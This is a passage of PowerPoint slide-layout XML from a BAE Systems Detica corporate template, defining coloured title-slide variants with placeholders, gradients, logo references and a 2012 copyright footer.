        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1"/>
              </a:gs>
              <a:gs pos="5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5" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>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descr="BAE_S_TITLE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BLACK DETICA LOGOTYP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287338"/>
            <a:ext cx="10080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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="348813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1608138"/>
            <a:ext cx="8572500" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060848"/>
            <a:ext cx="8572500" cy="4608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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1AD2678A-3D01-41B0-825E-EADC5020EED1}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144246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ORANGE  FULL BLLED">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2"/>
              </a:gs>
              <a:gs pos="85000">
                <a:srgbClr val="FFDD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5" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>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descr="BAE_S_TITLE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BLACK DETICA LOGOTYP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287338"/>
            <a:ext cx="10080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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="348813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"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238125" y="1608138"/>
            <a:ext cx="8572500" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060848"/>
            <a:ext cx="8572500" cy="4608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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CF48D05C-B148-44AB-83B4-DA44AC3120E4}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423014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GREEN  FULL BLLED">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="00B050"/>
              </a:gs>
              <a:gs pos="85000">
                <a:srgbClr val="ADCB57"/>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5" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>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descr="BAE_S_TITLE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BLACK DETICA LOGOTYP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287338"/>
            <a:ext cx="10080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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="340093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1608138"/>
            <a:ext cx="8572500" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060848"/>
            <a:ext cx="8572500" cy="4608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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7D469C8B-4282-4545-A5D3-ADAB93366874}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="916797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URPLE  FULL BLLED">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="6E1873"/>
              </a:gs>
              <a:gs pos="85000">
                <a:srgbClr val="B8328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5" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>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descr="BAE_S_TITLE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BLACK DETICA LOGOTYP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287338"/>
            <a:ext cx="10080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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="340093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1608138"/>
            <a:ext cx="8572500" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060848"/>
            <a:ext cx="8572500" cy="4608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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5B7B29C0-D1EA-431B-B249-EF309F4F0D26}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119210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GREY  FULL BLLED">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
